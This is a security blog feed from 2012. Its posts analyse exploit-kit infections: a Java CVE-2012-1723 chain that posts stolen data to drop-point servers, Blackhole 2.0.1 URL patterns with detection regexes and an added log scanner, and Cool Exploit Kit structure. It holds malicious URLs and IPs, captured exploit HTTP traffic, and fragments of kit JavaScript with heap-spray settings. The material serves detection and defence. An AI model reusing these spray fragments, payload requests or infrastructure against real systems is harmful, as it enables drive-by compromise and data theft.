<pre style="font-family: 'Courier New', monospace; font-size: 13px;"></pre>
<pre></pre>
<pre><span style="font-family: Courier New, monospace;"><b>
</b></span></pre>
<pre><span style="font-family: Courier New, monospace;"><b>The redirect is to rigo6680.zapto.org/?go=2, which is consistent with TDS (traffic direction system) redirects.</b></span></pre>
<pre><span style="font-family: Courier New, monospace;">
</span></pre>
<pre><span style="font-family: Courier New, monospace;"><a href="http://jsunpack.jeek.org/?report=a41f7d02a6ef035c6808676b1cbd74814d53c88b">http://jsunpack.jeek.org/?report=a41f7d02a6ef035c6808676b1cbd74814d53c88b</a></span></pre>
<pre><span style="font-family: Courier New, monospace;">
</span></pre>
<pre style="font-family: 'Courier New', monospace; font-size: 13px;">Additional redirects appear everywhere on the page, see the CSS redirect below.</pre>
<pre style="font-family: 'Courier New', monospace; font-size: 13px;"></pre>
</pre>
<b>Redirect from a CSS file.</b><br />
<a href="http://wepawet.iseclab.org/view.php?hash=38d20de85abbc89a79ad6901b4f7becb&type=js&t=1354367725">http://wepawet.iseclab.org/view.php?hash=38d20de85abbc89a79ad6901b4f7becb&type=js&t=1354367725</a><br />
<br />
<h3>
<b>What happens next?</b></h3>
<br />
The following URL chain occurs. It includes a YouTube video served from the 74.125.x.y IP addresses.<br />
<br />
<br />
609 31.956187 10.1.2.3 -> 74.125.236.9 HTTP 408 GET /v/hYaYCPmFWKw&hl=en&fs=1 HTTP/1.1<br />
613 32.126215 10.1.2.3 -> 65.163.12.222 HTTP 454 GET /wp-content/themes/twentyten/images/wordpress.png HTTP/1.1<br />
616 32.196442 65.163.12.222 -> 10.1.2.3 HTTP 1152 HTTP/1.1 200 OK (PNG)<br />
625 32.545505 74.125.236.9 -> 10.1.2.3 HTTP 674 HTTP/1.1 200 OK (application/x-shockwave-flash)<br />
637 33.374071 10.1.2.3 -> 64.34.183.111 HTTP 335<span style="color: red;"> <b>GET /2354796716/12230</b> </span>HTTP/1.1<br />
673 33.543459 10.1.2.3 -> 74.125.236.1 HTTP 382 GET /yts/swfbin/watch_as3-vfl1ubMZd.swf HTTP/1.1<br />
688 33.587050 64.34.183.111 -> 10.1.2.3 HTTP 104 HTTP/1.1 200 OK (application/x-java-archive)<br />
695 33.626438 10.1.2.3 -> 64.34.183.111 HTTP 292 <b><span style="color: red;">GET /2354796716/12230</span></b> HTTP/1.1<br />
744 33.867125 64.34.183.111 -> 10.1.2.3 HTTP 104 HTTP/1.1 200 OK (application/x-java-archive)<br />
770 34.193535 10.1.2.3 -> 64.34.183.111 HTTP 245<span style="color: red;"> <b>GET /15692</b></span> HTTP/1.1<br />
931 34.501338 64.34.183.111 -> 10.1.2.3<b> HTTP/DL 958 unknown (0x4d)</b><br />
<b><br /></b>
<b>Here's the Java.</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgInrndUzq9UyFrmn7bbyohLjqk8cbCD-CVfvmP0kIT5lebf__MA3zKDto5IZuxLvGTQ700N910zNXiBBi3wxpJnjEnPPYfqst5MwX_P8AgTxlfQGfZBqeDoLSjelnXLjbt8HEuAxYQg5g/s1600/hellooo.pkfile.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgInrndUzq9UyFrmn7bbyohLjqk8cbCD-CVfvmP0kIT5lebf__MA3zKDto5IZuxLvGTQ700N910zNXiBBi3wxpJnjEnPPYfqst5MwX_P8AgTxlfQGfZBqeDoLSjelnXLjbt8HEuAxYQg5g/s640/hellooo.pkfile.png" width="640" /></a></div>
<b><br /></b>
<br />
<b>And we run the Java, which contains CVE 2012-1723; the binary materializes and is executed immediately.</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYgyzYgupiZsFBI0zAnrCeL1fLn2xq6hg1ZFNII0pWyUC_VgE81fZpWvbJ-cwyZ0sEmoIyEku_qOl4A1oyu89vZCLDBoerHYeKNkBdjNw2ENfmq-JSbNakacBaUQP6P95gSYlS9d29Bes/s1600/hello+exe+file.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYgyzYgupiZsFBI0zAnrCeL1fLn2xq6hg1ZFNII0pWyUC_VgE81fZpWvbJ-cwyZ0sEmoIyEku_qOl4A1oyu89vZCLDBoerHYeKNkBdjNw2ENfmq-JSbNakacBaUQP6P95gSYlS9d29Bes/s640/hello+exe+file.PNG" width="640" /></a></div>
<br />
<h3>
Posting Data to Drop Points</h3>
<br />
What we get are connections on TCP port 35516 posting data to compromised Windows servers online. <b>What is interesting about this is that it is not recognized as HTTP</b>. It is only protocol TCP and on outbound port 35516. This would fly under the radar of many detection mechanisms.<br />
<br />
This infection is a wonderful case study in an infection chain using difficult to detect methods and exploiting weaknesses in infrastructure, perimeter security and vulnerable workstation software.<br />
<br />
Four IP addresses were drop points:<br />
131.96.243.22<br />
74.59.207.114<br />
68.197.117.117<br />
87.203.78.137<br />
<br />
The infection point is 64.34.183.111:8080<br />
<br />
Here is what the Posting looks like.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4VMR7z7n3_xxfpbykQ86h4Vl90cTuk-sUJBDwnttZCV-6yQx8vfQHGN8oaqmT4_Cgj10VlCstSUkDvYbcluVY6QKSWmyaEidbCCgGbsVrvRMcY_fiXyWx816mt33RWj_XJapMoIhXBbw/s1600/helloo+posting.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="214" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4VMR7z7n3_xxfpbykQ86h4Vl90cTuk-sUJBDwnttZCV-6yQx8vfQHGN8oaqmT4_Cgj10VlCstSUkDvYbcluVY6QKSWmyaEidbCCgGbsVrvRMcY_fiXyWx816mt33RWj_XJapMoIhXBbw/s640/helloo+posting.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6Cl4tLExlGaexmI7US-G7Yp8fHsn7-2-IcHz9Si5sjh5uPpaf-tYd7VZwQv4bzYT2ma7QcPns2SJJlJWL1IC7vRn41brzqln2M-Sq8Nni4s99zUKe2Gpo_usr7zuEWLti_05srwcjTZA/s1600/helloo+posting.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6Cl4tLExlGaexmI7US-G7Yp8fHsn7-2-IcHz9Si5sjh5uPpaf-tYd7VZwQv4bzYT2ma7QcPns2SJJlJWL1IC7vRn41brzqln2M-Sq8Nni4s99zUKe2Gpo_usr7zuEWLti_05srwcjTZA/s640/helloo+posting.PNG" width="640" /></a></div>
<br />
<br />
<br />
<br />
<b>VT for Jar file. CVE 2012-1723 - 2/46</b><br />
<pre class="dualColTextStyle" hasbox="2">https://www.virustotal.com/file/4f88dd9dbeaba9a59ab1c077b4e98be72c66e59f79ad8cc95c0952530ca698f3/analysis/1354328781/</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">ed-309-aaenak<span style="background-color: white; color: #002b82; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 13px; font-weight: bold; white-space: normal;">.</span>gsu.edu</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">Raw POST information</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">POST /nymain/nm1932719/index.php HTTP/1.1
Host: 131.96.243.22
Content-Length: 54
Accept-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Cache-Control: no-cache
Connection: close
filename=bphgt.ntz&data=œT¬»ñOõ[!5a9±r8ÆàSÞ¼ƒAôˆPöêÙ</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">HTTP/1.1 200 OK
Content-Length: 4
Connection: close
[</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">------------------------------------------------------------------</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2">POST /nymain/nm1932719/index.php HTTP/1.1
Host: 74.59.207.114
Content-Length: 58
Accept-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Cache-Control: no-cache
Connection: close
filename=skjlrke.kcf&data=¾¤±ß]NçWB\—%~}SóCå£tZ‡£¬4Ø–‘</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<pre class="dualColTextStyle" hasbox="2"><div hasbox="2">
<span id="drill-22-partial" style="color: red;"></span><span hasbox="2" id="drill-22-data"><span hasbox="2">videotron.ca</span> <span hasbox="2">(1)</span> </span><br />
<span hasbox="2">
</span>
<span hasbox="2">Host: </span>modemcable114<span style="background-color: white; color: #002b82; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 13px; font-weight: bold; white-space: normal;">.</span>207-59-74<span style="background-color: white; color: #002b82; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 13px; font-weight: bold; white-space: normal;">.</span>mc<span style="background-color: white; color: #002b82; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 13px; font-weight: bold; white-space: normal;">.</span>videotron.ca</div>
</pre>
<pre class="dualColTextStyle" hasbox="2"></pre>
<h3>
<br /></h3>
<div>
<span style="font-size: small; font-weight: normal;"><br /></span></div>
<div>
<span style="font-size: small; font-weight: normal;">@fknsec</span></div>
<pre class="dualColTextStyle" hasbox="2"><span style="font-size: xx-small;">
</span></pre>
<pre class="dualColTextStyle" hasbox="2"><span style="font-size: xx-small;">All investigations were performed in my personal lab. This article's content and any opinions expressed are not the opinions of any past, present or future employer. Lawyers are our friends.</span></pre>
Fort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com0tag:blogger.com,1999:blog-407866255126559296.post-79516616514805000342012-11-24T12:57:00.000-08:002012-11-24T12:57:17.922-08:00Blackhole 2.0.1 Exploit - URL Pattern<h2>
</h2>
<h2>
Blackhole Exploit Kit 2.0.1 - URL Pattern</h2>
<h2>
<span style="font-family: inherit; font-size: x-small; font-weight: normal;">Written by Frank Angiolelli, CISSP</span></h2>
<div>
<br /></div>
<div style="text-align: center;">
<div style="text-align: left;">
Blackhole 2.0 has evolved into Blackhole 2.0.1, which incorporates the Java 2012-5076 exploit, and the URL structure has evolved with it. Currently, the iframes are built with adjusted URLs that include what appear to be hard-coded values.</div>
</div>
<div>
<br />
<b>Example:</b><br />
<span style="color: red;"><iframe src="/obtaining/notify- publishes_ post-used. php?tvipazdb=1l:1f:33:1n:1j&bkb=j& zizcdg=30:1n:1h :30:1n:33:30:1m: 2v:32& edd=1f:1d:1f:1d:1f: 1d:1f"></iframe></span><br />
<br />
<br />
<h3>
<b>The PDF:</b></h3>
<br />
The PDF GET requests that I have researched and observed recently consistently contain the following string:<br />
<br />
<b>"1n:1d:1f:1d:1f:1d:1j:1k:1l"</b><br />
<br />
So patterned out, it looks like this:<br />
<br />
<div style="text-align: center;">
<b>\.php\?\w{2,8}\=((1|2|3)[a-z0-9]\:){4}(1|2|3)[a-z0-9]\&\w{2,8}\=[a-z0-9]{2}\&\w{2,8}\=((1|2|3)[a-z0-9]\:){9}(1|2|3)[a-z0-9]\&\w{2,8}\=1n\:1d\:1f\:1d\:1f\:1d\:1j\:1k\:1l</b></div>
<br />
Additionally, it appears that the second parameter value is consistently a 2 character value, though no longer hexadecimal. Ostensibly, the structure pattern is the same with some minor variations to throw off detection. <br />
<br />
It should be noted this may not catch every single variation, but currently I know there are enough matches to make this likely valuable.<br />
<br />
<b>Examples:</b><br />
<span style="color: red;">/links/excuse_lorrys-names-carries.php?iucvwm=2w:31:33:1o:1g&rxjw=3j&aqpmcap=2w:1k:30:31:1j:1h:33:1m:1f:33&zprptb=1n:1d:1f:1d:1f:1d:1j:1k:1l</span><br />
<span style="color: red;"><br /></span>
<span style="color: red;">/pleasing/forward-facts.php?dht=1g:2v:33:2v:2w&hxala=33&nbz=33:1l:1g:2v:30:1m:33:32:1l:1k&zrchhlmf=1n:1d:1f:1d:1f:1d:1j:1k:1l </span><br />
<span style="color: red;"><br /></span>
<span style="color: red;">hxxp://cosmic-calls.net/detects/mixing-evened-quits-spot.php?xpu=2w:31:33:1o:1g&ftzajz=3a&jlzjamgn=1k:2w:32:30:1n:1h:33:31:2v:2w&xlxsjzzi=1n:1d:1f:1d:1f:1d:1j:1k:1l</span><br />
<span style="color: red;"><br /></span>
<span style="color: red;">/less/pounds-value_mean.php?fhkguehd=31:2v:30:1i:1o&vcyvea=36&qpqvia=1n:30:30:31:2v:2w:1o:1f:1f:31&pjqnyncg=1n:1d:1f:1d:1f:1d:1j:1k:1l</span><br />
<br />
<h3>
The Java:</h3>
<br />
The Java request, when used as the direct exploit, is identical to the entry point URL in my investigations; however, the content type is adjusted to application/x-java-archive. See the exploit chain towards the end of this article. I am unsure of what the structure looks like after a PDF is served.<br />
<br />
<h3>
The Binary:</h3>
Additionally, the URL structure is similar to the 2.0 URL structure: the first parameter of the binary GET request has 10 characters, though they are no longer hex, and the second parameter contains 20 characters, again not hex. These values are now separated by colons.<br />
<br />
The binary GET request appears at this time to match the following pattern. It is slightly wide to allow for additional variants I may not be seeing. Please send any false positives, and any suggestions for adjustments or optimization, to @fknsec.<br />
<br />
<div style="text-align: center;">
<b>\.php\?(\w{2,8}\=((1|2|3)[a-z0-9]\s?\:\s?){4}(1|2|3)[a-z0-9]\&)(\w{2,8}\=((1|2|3)[a-z0-9]\s?\:\s?){9}(1|2|3)[a-z0-9]\&)\w{1,8}\=\w{2}\&\w{2,8}\=\w{1,8}\&\w{2,8}\=\w</b></div>
<br />
The primary difference observed at this point is that the Blackhole 2.0.1 favors serving the Java 2012-5076 exploit before the Adobe PDF is served, as seen with systems having Java 6u35 and Adobe 9.x. In my previous article on Blackhole 2.0, the kit exclusively served a PDF file first.<br />
<br />
<b>Binary Examples:</b><br />
<span style="color: red;">/less/pounds-value_mean.php?if=1i:1m:2w:1g:1o&pe=1n:30:30:31:2v:2w:1o:1f:1f:31&k=1f&rg=m&ht=b</span><br />
<span style="color: red;"><br /></span>
<span style="color: red;">hxxp://62.109.24.128/links/excuse_lorrys-names-carries.php?df=1o:1l:31:1o:1f&ne=2w:1k:30:31:1j:1h:33:1m:1f:33&x=1f&fb=g&ci=b</span><br />
<span style="color: red;"><br /></span>
<span style="color: red;">http://syenial.com/links/1.php?rf=1k:1g:1i:1i:1m&oe=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&p=1f&rq=x&vf=d</span><br />
<br />
<h3>
Blackhole 2.0.1 In Action:</h3>
<br />
GET /less/pounds-value_mean.php HTTP/1.1<br />
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*<br />
Accept-Language: en-us<br />
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)<br />
Accept-Encoding: gzip, deflate<br />
Host: u91s.info<br />
Connection: Keep-Alive<br />
<br />
HTTP/1.1 200 OK<br />
Server: nginx/1.0.15<br />
Date: Sat, 24 Nov 2012 19:33:55 GMT<br />
<b>Content-Type: text/html</b><br />
Transfer-Encoding: chunked<br />
Connection: keep-alive<br />
<br />
<br />
f86<br />
<html><head><title></title></head><body><object classid="clsid:8AD9C840-044E-11D1<br />
-B3E9-00805F499D93" codebase="http://java.sun.com/update/1.6.0/jinstall-6u60-wind<br />
ows-i586.cab#Version=6,0,0,0" WIDTH="200" HEIGHT="200" ><PARAM NAME="CODE" VALUE=<br />
"hw"><PARAM NAME="ARCHIVE" VALUE="/less/pounds-value_mean.php"><param name="type"<br />
value="application/x-java-applet"><param name="val" value="0b0909041f"/><param n<br />
ame="prime" value="3131213e37193c323a2c173143351919310417213a0019220e1a4321350c23<br />
351a3a3c040b043d322c3937321f37231f270a1f37051f371702043539373a1f081c1f081c1f08371<br />
f270e1f270a1f37171f372c1f372c1f0837021139372c0244053923020b093928"/></<br />
<br />
<br />
<br />
<br />
<b>Then:</b><br />
<br />
<br />
<br />
<br />
GET /less/pounds-value_mean.php HTTP/1.1<br />
accept-encoding: pack200-gzip, gzip<br />
<b>content-type: application/x-java-archive</b><br />
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29<br />
Host: u91s.info<br />
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2<br />
Connection: keep-alive<br />
<br />
<br />
HTTP/1.1 200 OK<br />
Server: nginx/1.0.15<br />
Date: Sat, 24 Nov 2012 19:33:58 GMT<br />
Content-Type: application/java-archive<br />
Connection: keep-alive<br />
Content-Length: 10940<br />
ETag: "c9a6c96d607f63a618e07759c2f7391e"<br />
Last-Modified: Sat, 24 Nov 2012 19:32:36 GMT<br />
Accept-Ranges: bytes<br />
<br />
<br />
PKñ¨vAMETA-INF/þÊPKPKñ¨vAMETA-INF/MANIFEST.MFóMÌËLK-.ÑK-*ÎÌϳR0Ô3àår.JM,IMÑuª˜éÄ+<br />
h—æ)øf&åW—¤æ+xæ%ëiòrù&fæé:ç$[)d”órñrPKAñ WWPKu¥vAhw.class<br />
<br />
<br />
<br />
<br />
<b>Finally the Binary:</b><br />
<br />
<br />
<br />
GET /less/pounds-value_mean.php?if=1i:1m:2w:1g:1o&pe=1n:30:30:31:2v:2w:1o:1f:1f:3<br />
1&k=1f&rg=m&ht=b HTTP/1.1<br />
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29<br />
Host: u91s.info<br />
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2<br />
Connection: keep-alive<br />
<br />
<br />
HTTP/1.1 200 OK<br />
Server: nginx/1.0.15<br />
Date: Sat, 24 Nov 2012 19:33:59 GMT<br />
Content-Type: application/x-msdownload<br />
Connection: keep-alive<br />
Content-Length: 131072<br />
Pragma: public<br />
Expires: Sat, 24 Nov 2012 19:32:37 GMT<br />
Cache-Control: must-revalidate, post-check=0, pre-check=0<br />
Cache-Control: private<br />
<b>Content-Disposition: attachment; filename="contacts.exe"</b><br />
Content-Transfer-Encoding: binary<br />
<br />
<br />
MZÿÿ¸@躴Í!¸LÍ!This program cannot be run in DOS mode.<br />
<br />
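The PDF and binary patterns above, run over proxy-style log lines and tagged by stage. This is an added example, not part of the original article: the two URL regexes are the article's own, while the tab-separated log layout, the `example.test` hosts, the tag names and the Java User-Agent check (taken from what the capture above shows) are assumptions made for illustration.

```python
import re

# The two URL patterns are the article's, copied verbatim.
PDF_RE = re.compile(
    r"\.php\?\w{2,8}\=((1|2|3)[a-z0-9]\:){4}(1|2|3)[a-z0-9]"
    r"\&\w{2,8}\=[a-z0-9]{2}"
    r"\&\w{2,8}\=((1|2|3)[a-z0-9]\:){9}(1|2|3)[a-z0-9]"
    r"\&\w{2,8}\=1n\:1d\:1f\:1d\:1f\:1d\:1j\:1k\:1l"
)
BINARY_RE = re.compile(
    r"\.php\?(\w{2,8}\=((1|2|3)[a-z0-9]\s?\:\s?){4}(1|2|3)[a-z0-9]\&)"
    r"(\w{2,8}\=((1|2|3)[a-z0-9]\s?\:\s?){9}(1|2|3)[a-z0-9]\&)"
    r"\w{1,8}\=\w{2}\&\w{2,8}\=\w{1,8}\&\w{2,8}\=\w"
)
# Assumption, not an article signature: in the capture the applet and the
# binary are both fetched by the Java runtime ("... Java/1.6.0_29").
JAVA_UA_RE = re.compile(r"\bJava/\d")

BROWSER_UA = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
JAVA_UA = "Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_29"

# Constructed log: client <TAB> host <TAB> request URI <TAB> User-Agent.
# Paths and parameters are the article's samples; the client addresses,
# the example.test hosts and the last (benign) line are made up.
SAMPLE_LOG = "\n".join("\t".join(row) for row in [
    ("10.1.2.3", "u91s.info", "/less/pounds-value_mean.php", BROWSER_UA),
    ("10.1.2.3", "u91s.info", "/less/pounds-value_mean.php", JAVA_UA),
    ("10.1.2.3", "u91s.info",
     "/less/pounds-value_mean.php?if=1i:1m:2w:1g:1o"
     "&pe=1n:30:30:31:2v:2w:1o:1f:1f:31&k=1f&rg=m&ht=b", JAVA_UA),
    ("10.1.2.9", "ek.example.test",
     "/pleasing/forward-facts.php?dht=1g:2v:33:2v:2w&hxala=33"
     "&nbz=33:1l:1g:2v:30:1m:33:32:1l:1k&zrchhlmf=1n:1d:1f:1d:1f:1d:1j:1k:1l",
     BROWSER_UA),
    ("10.1.2.7", "shop.example.test", "/cart.php?item=12:30&qty=2&ref=ab",
     BROWSER_UA),
])


def classify(uri, user_agent=""):
    """Tag one request, or return None when nothing matches."""
    if BINARY_RE.search(uri):
        return "bh201-binary"
    if PDF_RE.search(uri):
        return "bh201-pdf"
    # The applet request reuses the landing URL with no query string, so the
    # URL alone cannot separate the two; the Java User-Agent can.
    if "?" not in uri and uri.endswith(".php") and JAVA_UA_RE.search(user_agent):
        return "java-fetch-php"
    return None


def scan(log_text):
    """Return (client, host, tag) for every log line that gets a tag."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split("\t")
        if len(fields) != 4:
            continue  # skip malformed lines instead of guessing at fields
        client, host, uri, user_agent = fields
        tag = classify(uri, user_agent)
        if tag:
            hits.append((client, host, tag))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

The browser's first request for the landing page gets no tag, which is why the Java-runtime fetch of a `.php` resource is worth logging as its own event.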
<b><br /></b>
<b>References:</b><br />
http://www.securitynotes.ro/2012/11/discovering-blackhole-part-i.html<br />
http://integriography.wordpress.com/2012/11/19/dissecting-a-blackhole-2-pdf-mostly-with-peepdf/<br />
http://wepawet.cs.ucsb.edu/view.php?type=js&hash=baeccb2947004ded2dc9079e89e42b41<br />
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrH3ELFCs_SJwhmmh6aLTFCPqS-rR_ln5dYJ57CUbUM5of7XPs3wLD-QlDVwEtq-68uGKj9fXDbyiCjW0aHR-OKY38txLQ6evHgM2dYbsce0cMmEN7Druq_OtZVgzm-YFpA9tMyzhmGixg/s1600/screenshot_1451.png<br />
http://www.scumware.org/report/94.250.251.61</div>
Fort Knox Networkshttp://www.blogger.com/profile/12394479781465013402noreply@blogger.com0tag:blogger.com,1999:blog-407866255126559296.post-6932549875085962702012-11-17T05:30:00.001-08:002012-11-17T13:38:39.204-08:00Cool Exploit Kit - URL StructureThe write up from <a href="http://malware.dontneedcoffee.com/2012/11/cool-ek-hello-my-friend-cve-2012-5067.html">malware.dontneedcoffee.com</a> on Cool Exploit Kit is excellent.<br />
<br />
Here, I will concentrate on how it is operating with an emphasis on detection based on URL structure. Please note, variants are possible and these may change, but as of now, this is what I am seeing. More to come, check back again.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdnKgNaq_OUSQiN0ovJlghTVsPEhLuPTpGmTADAQz7x2A2sSJmU11IUtZqrNe-DH2RYh4D5agDBirC14EL6RqHdRntMQ9DIL6YZE9uyXrgO2dYYt2eLKH7zVDFtR3TQe2PmSM0KoeCjDs/s1600/cool+exploit+benign.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="61" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdnKgNaq_OUSQiN0ovJlghTVsPEhLuPTpGmTADAQz7x2A2sSJmU11IUtZqrNe-DH2RYh4D5agDBirC14EL6RqHdRntMQ9DIL6YZE9uyXrgO2dYYt2eLKH7zVDFtR3TQe2PmSM0KoeCjDs/s640/cool+exploit+benign.PNG" width="640" /></a></div>
<br />
<br />
<h2>
<b>Cool Exploit Kit URL Structure</b></h2>
The observed Cool Exploit Kit contains the following static URL entries.<br />
<br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">/32size_font.eot</span><br />
<span style="font-size: large;">/64size_font.eot</span><br />
<span style="font-size: large;">/media/field.swf</span><br />
<span style="font-size: large;">/media/pdf_new.php</span><br />
<span style="font-size: large;">/media/pdf_old.php</span><br />
<span style="font-size: large;">/media/score.swf</span><br />
<span style="font-size: large;">/media/new.jar</span><br />
<span style="font-size: large;">/media/file.jar</span><br />
<span style="font-size: large;">/bagdfssdb.jar</span><br />
<span style="font-size: large;">/flash.swf?info=[a-f0-9]{32,}</span><br />
<br />
<b style="font-size: x-large;">Binary Regex: </b><span style="font-size: large; white-space: pre-wrap;">\/[a-z]\/f\.php\?k=\d(&e=\d&f=\d)?$</span><br />
(Credit <a href="http://www.emergingthreats.net/">Emergingthreats</a> <span style="white-space: pre-wrap;">sid:2015873)</span><br />
<b><br /></b>
The current implementations of this exploit kit reside under single-letter subdirectories, e.g. "/r/media" or "/t/media", but it appears any single letter is possible.<br />
<br />
<h2>
Known Repeat Offenders:</h2>
<br />
46.21.148.217<br />
184.170.142.13<br />
85.143.166.112<br />
193.0.179.5<br />
<div>
<br /></div>
<br />
<h3>
PluginDetect 0.7.9</h3>
<br />
<blockquote class="tr_bq">
<span style="color: red;"> <body onload='try{window.focus();}catch(e){}'></span><br />
<span style="color: red;">var PluginDetect={</span><br />
<span style="color: red;"> version:"0.7.9",</span></blockquote>
<br />
It is using plugin detect. It is doing the math and extracting the version numbers, I think we are all familiar with this (beating a dead horse).<br />
<br />
<br />
<blockquote class="tr_bq">
<span style="color: red;">JavaVersions:[[1,9,1,40],[1,8,1,40],[1,7,1,40],[1,6,0,40],[1,5,0,30],[1,4,2,30],[1,3,1,30]],query:function(){</span><br />
<span style="color: red;"> var a=this,e=a.$,b=a.$$,c=(a.hasRun||a.disabled());</span><br />
<span style="color: red;"> a.hasRun=1;</span><br />
<span style="color: red;"> if(c){</span><br />
<span style="color: red;"> return a}</span><br />
<span style="color: red;"> var i=[],k=[1,5,0,14],j=[1,6,0,2],h=[1,3,1,0],g=[1,4,2,0],f=[1,5,0,7],d=b.getInfo?true:false,l={</span><br />
<span style="color: red;"> };</span></blockquote>
<br />
Now, let's look deeper into what it is asking for based on your versions:<br />
<br />
<h3>
Flash</h3>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioPPUZTawHROYS_WoPL_oqCelWdDS4mpr85tpXRpnqsY58qytxxJxpSFcBZFnV0qM4nkBHZwppVy_GHTXlXl7fVq91puFPIk9gT07UjH-bpaHaTxDaQR4lrm29g8HDvsOOTrDsoecwu9M/s1600/field.swf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="76" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioPPUZTawHROYS_WoPL_oqCelWdDS4mpr85tpXRpnqsY58qytxxJxpSFcBZFnV0qM4nkBHZwppVy_GHTXlXl7fVq91puFPIk9gT07UjH-bpaHaTxDaQR4lrm29g8HDvsOOTrDsoecwu9M/s640/field.swf.png" width="640" /></a></div>
<div>
<br /></div>
<blockquote class="tr_bq">
<span style="color: red;">function getCN(){</span><b><span style="color: red;"> return "../media/score.swf"}</span></b><span style="color: red;"> function getBlockSize(){</span><span style="color: red;"> return 1024}</span><span style="color: red;"> function getAllocSize(){</span><span style="color: red;"> return 1024*1024}</span><span style="color: red;"> function getAllocCount(){</span><span style="color: red;"> return 300}</span><span style="color: red;"> function getFillBytes(){</span><span style="color: red;"> var a='%u'+'0c0c';</span><span style="color: red;"> return a+a}</span><span style="color: red;"> function getShellCode(){</span><br />
<span style="color: red;">oSpan.innerHTML="<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id'><param name='movie' value='..<b>/media/field.swf' /></b></span></blockquote>
Then we have this possibility<br />
<br />
<blockquote class="tr_bq">
<span style="color: red;"><param name='movie' value='../media/flash.swf?info="+avmurl+"' /><embed src='../media/flash.swf?info="+avmurl+"' name='asd' align='middle' allowNetworking='all' type='application/x-shockwave-flash' pluginspage='http://www.macromedia.com/go/getflashplayer'></embed></object>"}</span></blockquote>
Which leads to something like this:<br />
<span style="font-family: Segoe UI, Arial, sans-serif;"><span style="font-size: 12px;">hxxp://monstercompanionsbonuses.info/data/flash.swf?info=02e6b1525353caa8adb5b7b55154335730b4b55732b6b17e08e8888930f129f18f4889a8888f096949898e70487096a91637293629b67a4b726e7f</span></span><br />
<br />
<br />
Ok great, we have score.swf, flash.swf?info= and field.swf. This is strangely familiar (rolling eyes).<br />
<br />
<h3>
Cool Exploit PDF Logic</h3>
<span style="font-family: inherit;">In the PDF logic, if the version of Adobe detected is lower than 8, it sets a variable vver to "old"; if it is greater than or equal to 8, it sets vver to "new". The exploit is recognized as <span style="text-align: center;">Adobe PDF Memory Corruption /Ff Dictionary Key Corruption</span>.</span><br />
<br />
<blockquote class="tr_bq">
<span style="color: red;">if (pdf[0] < 8){</span><br />
<span style="color: red;"> vver = "old";</span><br />
